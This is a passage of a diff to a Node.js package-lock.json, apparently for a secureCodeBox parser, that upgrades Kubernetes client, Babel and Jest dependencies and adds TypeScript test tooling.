"^29.2.5" - }, "devDependencies": { - "@kubernetes/client-node": "^0.19.0", + "@kubernetes/client-node": "^1.3.0", "@securecodebox/parser-sdk-nodejs": "file:../../parser-sdk/nodejs", + "@types/jest": "^29.5.14", "jest": "^29.7.0", - "prettier": "^3.4.2" + "prettier": "^3.6.0", + "ts-jest": "^29.2.5" } }, "../../parser-sdk/nodejs": { @@ -26,19 +23,18 @@ "dev": true, "license": "Apache-2.0", "dependencies": { - "@kubernetes/client-node": "^0.22.3", + "@kubernetes/client-node": "^1.3.0", "ajv": "^8.17.1", "ajv-draft-04": "^1.0.0", "ajv-formats": "^3.0.1", - "axios": "^1.7.8", - "jsonpointer": "^5.0.1", - "ws": "^8.13.0" + "jsonpointer": "^5.0.1" } }, "node_modules/@ampproject/remapping": { "version": "2.2.1", "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.1.tgz", "integrity": "sha512-lFMjJTrFL3j7L9yBxwYfCq2k6qqwHyzuUl/XBnif78PWTJYyL/dfowQHWE3sp6U6ZzqWiiIZnpTMO96zhkjwtg==", + "dev": true, "dependencies": { "@jridgewell/gen-mapping": "^0.3.0", "@jridgewell/trace-mapping": "^0.3.9" @@ -48,13 +44,15 @@ } }, "node_modules/@babel/code-frame": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.26.2.tgz", - "integrity": "sha512-RJlIHRueQgwWitWgF8OdFYGZX328Ax5BCemNGlqHfplnRT9ESi8JkFlvaVYbS+UubVY6dpv87Fs2u5M29iNFVQ==", + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.27.1.tgz", + "integrity": "sha512-cjQ7ZlQ0Mv3b47hABuTevyTuYN4i+loJKGeV9flcCgIK37cCXRh+L1bd3iBHlynerhQ7BhCkn2BPbQUL+rGqFg==", + "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-validator-identifier": "^7.25.9", + "@babel/helper-validator-identifier": "^7.27.1", "js-tokens": "^4.0.0", - "picocolors": "^1.0.0" + "picocolors": "^1.1.1" }, "engines": { "node": ">=6.9.0" @@ -64,6 +62,7 @@ "version": "7.26.2", "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.26.2.tgz", "integrity": "sha512-Z0WgzSEa+aUcdiJuCIqgujCshpMWgUpgOxXotrYPSA53hA3qopNaqcJpyr0hVb1FeWdnqFA35/fUtXgBK8srQg==", + "dev": true, "engines": { "node": ">=6.9.0" } @@ -72,6 +71,7 @@ "version": "7.26.0", "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.26.0.tgz", "integrity": "sha512-i1SLeK+DzNnQ3LL/CswPCa/E5u4lh1k6IAEphON8F+cXt0t9euTshDru0q7/IqMa1PMPz5RnHuHscF8/ZJsStg==", + "dev": true, "dependencies": { "@ampproject/remapping": "^2.2.0", "@babel/code-frame": "^7.26.0", @@ -101,6 +101,7 @@ "version": "7.26.2", "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.26.2.tgz", "integrity": "sha512-zevQbhbau95nkoxSq3f/DC/SC+EEOUZd3DYqfSkMhY2/wfSeaHV1Ew4vk8e+x8lja31IbyuUa2uQ3JONqKbysw==", + "dev": true, "dependencies": { "@babel/parser": "^7.26.2", "@babel/types": "^7.26.0", @@ -116,6 +117,7 @@ "version": "7.25.9", "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.25.9.tgz", "integrity": "sha512-j9Db8Suy6yV/VHa4qzrj9yZfZxhLWQdVnRlXxmKLYlhWUVB1sB2G5sxuWYXk/whHD9iW76PmNzxZ4UCnTQTVEQ==", + "dev": true, "dependencies": { "@babel/compat-data": "^7.25.9", "@babel/helper-validator-option": "^7.25.9", @@ -131,6 +133,7 @@ "version": "7.25.9", "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.25.9.tgz", "integrity": "sha512-tnUA4RsrmflIM6W6RFTLFSXITtl0wKjgpnLgXyowocVPrbYrLUXSBXDgTs8BlbmIzIdlBySRQjINYs2BAkiLtw==", + "dev": true, "dependencies": { "@babel/traverse": "^7.25.9", "@babel/types": "^7.25.9" @@ -143,6 +146,7 @@ "version": "7.26.0", "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.26.0.tgz", "integrity": "sha512-xO+xu6B5K2czEnQye6BHA7DolFFmS3LB7stHZFaOLb1pAwO1HWLS8fXA+eh0A2yIvltPVmx3eNNDBJA2SLHXFw==", + "dev": true, "dependencies": { "@babel/helper-module-imports": "^7.25.9", "@babel/helper-validator-identifier": "^7.25.9", @@ -159,22 +163,27 @@ "version": "7.25.9", "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.25.9.tgz", "integrity": "sha512-kSMlyUVdWe25rEsRGviIgOWnoT/nfABVWlqt9N19/dIPWViAOW2s9wznP5tURbs/IDuNk4gPy3YdYRgH3uxhBw==", + "dev": true, "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helper-string-parser": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.25.9.tgz", - "integrity": "sha512-4A/SCr/2KLd5jrtOMFzaKjVtAei3+2r/NChoBNoZ3EyP/+GlhoaEGoWOZUmFmoITP7zOJyHIMm+DYRd8o3PvHA==", + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.27.1.tgz", + "integrity": "sha512-qMlSxKbpRlAridDExk92nSobyDdpPijUq2DW6oDnUqd0iOGxmQjyqhMIihI9+zv4LPyZdRje2cavWPbCbWm3eA==", + "dev": true, + "license": "MIT", "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helper-validator-identifier": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.25.9.tgz", - "integrity": "sha512-Ed61U6XJc3CVRfkERJWDz4dJwKe7iLmmJsbOGu9wSloNSFttHV0I8g6UAgb7qnK5ly5bGLPd4oXZlxCdANBOWQ==", + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.27.1.tgz", + "integrity": "sha512-D2hP9eA+Sqx1kBZgzxZh0y1trbuU+JoDkiEwqhQ36nodYqJwyEIhPSdMNd7lOm/4io72luTPWH20Yda0xOuUow==", + "dev": true, + "license": "MIT", "engines": { "node": ">=6.9.0" } @@ -183,28 +192,33 @@ "version": "7.25.9", "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.25.9.tgz", "integrity": "sha512-e/zv1co8pp55dNdEcCynfj9X7nyUKUXoUEwfXqaZt0omVOmDe9oOTdKStH4GmAw6zxMFs50ZayuMfHDKlO7Tfw==", + "dev": true, "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helpers": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.26.0.tgz", - "integrity": "sha512-tbhNuIxNcVb21pInl3ZSjksLCvgdZy9KwJ8brv993QtIVKJBBkYXz4q4ZbAv31GdnC+R90np23L5FbEBlthAEw==", + "version": "7.27.6", + "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.27.6.tgz", + "integrity": "sha512-muE8Tt8M22638HU31A3CgfSUciwz1fhATfoVai05aPXGor//CdWDCbnlY1yvBPo07njuVOCNGCSp/GTt12lIug==", + "dev": true, + "license": "MIT", "dependencies": { - "@babel/template": "^7.25.9", - "@babel/types": "^7.26.0" + "@babel/template": "^7.27.2", + "@babel/types": "^7.27.6" }, "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/parser": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.26.2.tgz", - "integrity": "sha512-DWMCZH9WA4Maitz2q21SRKHo9QXZxkDsbNZoVD62gusNtNBBqDg9i7uOhASfTfIGNzW+O+r7+jAlM8dwphcJKQ==", + "version": "7.27.5", + "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.27.5.tgz", + "integrity": "sha512-OsQd175SxWkGlzbny8J3K8TnnDD0N3lrIUtB92xwyRpzaenGZhxDvxN/JgU00U3CDZNj9tPuDJ5H0WS4Nt3vKg==", + "dev": true, + "license": "MIT", "dependencies": { - "@babel/types": "^7.26.0" + "@babel/types": "^7.27.3" }, "bin": { "parser": "bin/babel-parser.js" @@ -217,6 +231,7 @@ "version": "7.8.4", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.8.0" }, @@ -228,6 +243,7 @@ "version": "7.8.3", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.8.0" }, @@ -239,6 +255,7 @@ "version": "7.12.13", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.12.13" }, @@ -250,6 +267,7 @@ "version": "7.10.4", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.10.4" }, @@ -261,6 +279,7 @@ "version": "7.8.3", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.8.0" }, @@ -272,6 +291,7 @@ "version": "7.25.9", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.25.9.tgz", "integrity": "sha512-ld6oezHQMZsZfp6pWtbjaNDF2tiiCYYDqQszHt5VV437lewP9aSi2Of99CK0D0XB21k7FLgnLcmQKyKzynfeAA==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.25.9" }, @@ -286,6 +306,7 @@ "version": "7.10.4", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.10.4" }, @@ -297,6 +318,7 @@ "version": "7.8.3", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.8.0" }, @@ -308,6 +330,7 @@ "version": "7.10.4", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.10.4" }, @@ -319,6 +342,7 @@ "version": "7.8.3", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.8.0" }, @@ -330,6 +354,7 @@ "version": "7.8.3", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.8.0" }, @@ -341,6 +366,7 @@ "version": "7.8.3", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.8.0" }, @@ -352,6 +378,7 @@ "version": "7.14.5", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.14.5" }, @@ -366,6 +393,7 @@ "version": "7.25.9", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.25.9.tgz", "integrity": "sha512-hjMgRy5hb8uJJjUcdWunWVcoi9bGpJp8p5Ol1229PoN6aytsLwNMgmdftO23wnCLMfVmTwZDWMPNq/D1SY60JQ==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.25.9" }, @@ -377,13 +405,15 @@ } }, "node_modules/@babel/template": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.25.9.tgz", - "integrity": "sha512-9DGttpmPvIxBb/2uwpVo3dqJ+O6RooAFOS+lB+xDqoE2PVCE8nfoHMdZLpfCQRLwvohzXISPZcgxt80xLfsuwg==", + "version": "7.27.2", + "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.27.2.tgz", + "integrity": "sha512-LPDZ85aEJyYSd18/DkjNh4/y1ntkE5KwUHWTiqgRxruuZL2F1yuHligVHLvcHY2vMHXttKFpJn6LwfI7cw7ODw==", + "dev": true, + "license": "MIT", "dependencies": { - "@babel/code-frame": "^7.25.9", - "@babel/parser": "^7.25.9", - "@babel/types": "^7.25.9" + "@babel/code-frame": "^7.27.1", + "@babel/parser": "^7.27.2", + "@babel/types": "^7.27.1" }, "engines": { "node": ">=6.9.0" @@ -393,6 +423,7 @@ "version": "7.25.9", "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.25.9.tgz", "integrity": "sha512-ZCuvfwOwlz/bawvAuvcj8rrithP2/N55Tzz342AkTvq4qaWbGfmCk/tKhNaV2cthijKrPAA8SRJV5WWe7IBMJw==", + "dev": true, "dependencies": { "@babel/code-frame": "^7.25.9", "@babel/generator": "^7.25.9", @@ -407,12 +438,14 @@ } }, "node_modules/@babel/types": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.26.0.tgz", - "integrity": "sha512-Z/yiTPj+lDVnF7lWeKCIJzaIkI0vYO87dMpZ4bg4TDrFe4XXLFWL1TbXU27gBP3QccxV9mZICCrnjnYlJjXHOA==", + "version": "7.27.6", + "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.27.6.tgz", + "integrity": "sha512-ETyHEk2VHHvl9b9jZP5IHPavHYk57EhanlRRuae9XCpb/j5bDCbPPMOBfCWhnl/7EDJz0jEMCi/RhccCE8r1+Q==", + "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-string-parser": "^7.25.9", - "@babel/helper-validator-identifier": "^7.25.9" + "@babel/helper-string-parser": "^7.27.1", + "@babel/helper-validator-identifier": "^7.27.1" }, "engines": { "node": ">=6.9.0" @@ -421,12 +454,14 @@ "node_modules/@bcoe/v8-coverage": { "version": "0.2.3", "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==" + "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", + "dev": true }, "node_modules/@istanbuljs/load-nyc-config": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", + "dev": true, "dependencies": { "camelcase": "^5.3.1", "find-up": "^4.1.0", @@ -442,6 +477,7 @@ "version": "1.0.10", "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", + "dev": true, "dependencies": { "sprintf-js": "~1.0.2" } @@ -450,6 +486,7 @@ "version": "3.14.1", "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", + "dev": true, "dependencies": { "argparse": "^1.0.7", "esprima": "^4.0.0" @@ -462,6 +499,7 @@ "version": "0.1.3", "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", + "dev": true, "engines": { "node": ">=8" } @@ -470,6 +508,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.7.0.tgz", "integrity": "sha512-5Ni4CU7XHQi32IJ398EEP4RrB8eV09sXP2ROqD4bksHrnTree52PsxvX8tpL8LvTZ3pFzXyPbNQReSN41CAhOg==", + "dev": true, "dependencies": { "@jest/types": "^29.6.3", "@types/node": "*", @@ -486,6 +525,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.7.0.tgz", "integrity": "sha512-n7aeXWKMnGtDA48y8TLWJPJmLmmZ642Ceo78cYWEpiD7FzDgmNDV/GCVRorPABdXLJZ/9wzzgZAlHjXjxDHGsg==", + "dev": true, "dependencies": { "@jest/console": "^29.7.0", "@jest/reporters": "^29.7.0", @@ -532,6 +572,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.7.0.tgz", "integrity": "sha512-aQIfHDq33ExsN4jP1NWGXhxgQ/wixs60gDiKO+XVMd8Mn0NWPWgc34ZQDTb2jKaUWQ7MuwoitXAsN2XVXNMpAw==", + "dev": true, "dependencies": { "@jest/fake-timers": "^29.7.0", "@jest/types": "^29.6.3", @@ -546,6 +587,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.7.0.tgz", "integrity": "sha512-8uMeAMycttpva3P1lBHB8VciS9V0XAr3GymPpipdyQXbBcuhkLQOSe8E/p92RyAdToS6ZD1tFkX+CkhoECE0dQ==", + "dev": true, "dependencies": { "expect": "^29.7.0", "jest-snapshot": "^29.7.0" @@ -558,6 +600,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.7.0.tgz", "integrity": "sha512-GlsNBWiFQFCVi9QVSx7f5AgMeLxe9YCCs5PuP2O2LdjDAA8Jh9eX7lA1Jq/xdXw3Wb3hyvlFNfZIfcRetSzYcA==", + "dev": true, "dependencies": { "jest-get-type": "^29.6.3" }, @@ -569,6 +612,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.7.0.tgz", "integrity": "sha512-q4DH1Ha4TTFPdxLsqDXK1d3+ioSL7yL5oCMJZgDYm6i+6CygW5E5xVr/D1HdsGxjt1ZWSfUAs9OxSB/BNelWrQ==", + "dev": true, "dependencies": { "@jest/types": "^29.6.3", "@sinonjs/fake-timers": "^10.0.2", @@ -585,6 +629,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.7.0.tgz", "integrity": "sha512-mpiz3dutLbkW2MNFubUGUEVLkTGiqW6yLVTA+JbP6fI6J5iL9Y0Nlg8k95pcF8ctKwCS7WVxteBs29hhfAotzQ==", + "dev": true, "dependencies": { "@jest/environment": "^29.7.0", "@jest/expect": "^29.7.0", @@ -599,6 +644,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.7.0.tgz", "integrity": "sha512-DApq0KJbJOEzAFYjHADNNxAE3KbhxQB1y5Kplb5Waqw6zVbuWatSnMjE5gs8FUgEPmNsnZA3NCWl9NG0ia04Pg==", + "dev": true, "dependencies": { "@bcoe/v8-coverage": "^0.2.3", "@jest/console": "^29.7.0", @@ -641,6 +687,7 @@ "version": "6.0.3", "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-6.0.3.tgz", "integrity": "sha512-Vtgk7L/R2JHyyGW07spoFlB8/lpjiOLTjMdms6AFMraYt3BaJauod/NGrfnVG/y4Ix1JEuMRPDPEj2ua+zz1/Q==", + "dev": true, "dependencies": { "@babel/core": "^7.23.9", "@babel/parser": "^7.23.9", @@ -656,6 +703,7 @@ "version": "7.6.3", "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true, "bin": { "semver": "bin/semver.js" }, @@ -667,6 +715,7 @@ "version": "29.6.3", "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.3.tgz", "integrity": "sha512-mo5j5X+jIZmJQveBKeS/clAueipV7KgiX1vMgCxam1RNYiqE1w62n0/tJJnHtjW8ZHcQco5gY85jA3mi0L+nSA==", + "dev": true, "dependencies": { "@sinclair/typebox": "^0.27.8" }, @@ -678,6 +727,7 @@ "version": "29.6.3", "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.3.tgz", "integrity": "sha512-MHjT95QuipcPrpLM+8JMSzFx6eHp5Bm+4XeFDJlwsvVBjmKNiIAvasGK2fxz2WbGRlnvqehFbh07MMa7n3YJnw==", + "dev": true, "dependencies": { "@jridgewell/trace-mapping": "^0.3.18", "callsites": "^3.0.0", @@ -691,6 +741,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.7.0.tgz", "integrity": "sha512-Fdx+tv6x1zlkJPcWXmMDAG2HBnaR9XPSd5aDWQVsfrZmLVT3lU1cwyxLgRmXR9yrq4NBoEm9BMsfgFzTQAbJYA==", + "dev": true, "dependencies": { "@jest/console": "^29.7.0", "@jest/types": "^29.6.3", @@ -705,6 +756,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.7.0.tgz", "integrity": "sha512-GQwJ5WZVrKnOJuiYiAF52UNUJXgTZx1NHjFSEB0qEMmSZKAkdMoIzw/Cj6x6NF4AvV23AUqDpFzQkN/eYCYTxw==", + "dev": true, "dependencies": { "@jest/test-result": "^29.7.0", "graceful-fs": "^4.2.9", @@ -719,6 +771,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.7.0.tgz", "integrity": "sha512-ok/BTPFzFKVMwO5eOHRrvnBVHdRy9IrsrW1GpMaQ9MCnilNLXQKmAX8s1YXDFaai9xJpac2ySzV0YeRRECr2Vw==", + "dev": true, "dependencies": { "@babel/core": "^7.11.6", "@jest/types": "^29.6.3", @@ -744,6 +797,7 @@ "version": "29.6.3", "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.3.tgz", "integrity": "sha512-u3UPsIilWKOM3F9CXtrG8LEJmNxwoCQC/XVj4IKYXvvpx7QIi/Kg1LI5uDmDpKlac62NUtX7eLjRh+jVZcLOzw==", + "dev": true, "dependencies": { "@jest/schemas": "^29.6.3", "@types/istanbul-lib-coverage": "^2.0.0", @@ -760,6 +814,7 @@ "version": "0.3.5", "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.5.tgz", "integrity": "sha512-IzL8ZoEDIBRWEzlCcRhOaCupYyN5gdIK+Q6fbFdPDg6HqX6jpkItn7DFIpW9LQzXG6Df9sA7+OKnq0qlz/GaQg==", + "dev": true, "dependencies": { "@jridgewell/set-array": "^1.2.1", "@jridgewell/sourcemap-codec": "^1.4.10", @@ -773,6 +828,7 @@ "version": "3.1.0", "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", + "dev": true, "engines": { "node": ">=6.0.0" } @@ -781,6 +837,7 @@ "version": "1.2.1", "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.2.1.tgz", "integrity": "sha512-R8gLRTZeyp03ymzP/6Lil/28tGeGEzhx1q2k703KGWRAI1VdvPIXdG70VJc2pAMw3NA6JKL5hhFu1sJX0Mnn/A==", + "dev": true, "engines": { "node": ">=6.0.0" } @@ -788,40 +845,68 @@ "node_modules/@jridgewell/sourcemap-codec": { "version": "1.4.15", "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.15.tgz", - "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==" + "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==", + "dev": true }, "node_modules/@jridgewell/trace-mapping": { "version": "0.3.25", "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.25.tgz", "integrity": "sha512-vNk6aEwybGtawWmy/PzwnGDOjCkLWSD2wqvjGGAgOAwCGWySYXfYoxt00IJkTF+8Lb57DwOb3Aa0o9CApepiYQ==", + "dev": true, "dependencies": { "@jridgewell/resolve-uri": "^3.1.0", "@jridgewell/sourcemap-codec": "^1.4.14" } }, + "node_modules/@jsep-plugin/assignment": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", + "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 10.16.0" + }, + "peerDependencies": { + "jsep": "^0.4.0||^1.0.0" + } + }, + "node_modules/@jsep-plugin/regex": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", + "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 10.16.0" + }, + "peerDependencies": { + "jsep": "^0.4.0||^1.0.0" + } + }, "node_modules/@kubernetes/client-node": { - "version": "0.19.0", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.19.0.tgz", - "integrity": "sha512-WTOjGuFQ8yeW3+qD6JrAYhpwpoQbe9R8cA/61WCyFrNawSTUgLstHu7EsZRYEs39er3jDn3wCEaczz+VOFlc2Q==", + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-1.3.0.tgz", + "integrity": "sha512-IE0yrIpOT97YS5fg2QpzmPzm8Wmcdf4ueWMn+FiJSI3jgTTQT1u+LUhoYpdfhdHAVxdrNsaBg2C0UXSnOgMoCQ==", "dev": true, + "license": "Apache-2.0", "dependencies": { "@types/js-yaml": "^4.0.1", - "@types/node": "^20.1.1", - "@types/request": "^2.47.1", - 